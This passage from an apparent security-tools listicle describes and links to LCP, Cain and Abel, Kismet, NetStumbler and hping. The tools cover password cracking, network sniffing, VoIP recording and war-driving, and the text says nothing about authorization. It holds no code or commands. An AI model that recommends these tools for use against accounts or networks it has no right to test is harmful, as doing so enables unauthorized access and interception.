The main purpose of the LCP program is auditing and recovering user account passwords in Windows NT/2000/XP/2003. Features: import of account information, password recovery, distributed brute force sessions, hash computation.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here – http://www.lcpsoft.com/english/download.htm

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here – http://www.oxid.it/cain.html

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (the classic recommendation was an Orinoco Gold card; today most cards with mac80211 drivers on Linux support monitor mode).

Get Kismet Here

14. NetStumbler

Yes, a decent wireless tool for Windows! Sadly not as powerful as its Linux counterparts, but it's easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g.

It has many uses:

  • Verify that your network is set up the way you intended.
  • Find locations with poor coverage in your WLAN.
  • Detect other networks that may be causing interference on your network.
  • Detect unauthorized rogue access points in your workplace.
  • Help aim directional antennas for long-haul WLAN links.
  • Use it recreationally for WarDriving.

Get NetStumbler Here – http://www.stumbler.net/

15. Hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. Its interface is inspired by the Unix ping command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and raw IP, has a traceroute mode, the ability to transfer files over a covert channel, and many other features.


Get hping Here – http://www.hping.org/

